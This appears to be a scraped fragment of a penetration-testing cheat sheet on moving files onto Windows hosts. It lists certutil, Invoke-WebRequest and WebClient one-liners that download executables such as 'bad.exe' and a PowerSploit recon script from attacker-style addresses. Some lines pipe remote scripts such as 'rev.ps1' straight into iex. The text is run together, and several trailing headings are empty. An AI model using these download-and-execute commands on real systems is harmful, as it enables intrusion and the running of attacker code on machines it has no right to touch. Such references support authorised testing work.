Windows
Certutils
certutil.exe -urlcache -split -f http://10.0.0.5/40564.exe bad.exeIWR (Invoke Web Request)
powershell.exe Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1
powershell.exe -command iwr -Uri http://192.168.1.2/putty.exe -OutFile C:\Temp\putty.exe "System.Net.WebClient
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/putty.exe', 'putty.exe')IEX
powershell.exe iex (New-Object Net.WebClient).DownloadString('http://192.168.119.193:8000/ps-sudo.ps1')powershell Invoke-WebRequest http://10.10.16.26/rev.ps1 | iexInternet Explorer Basic Parsing

Escaping shell
Script
SMB
Last updated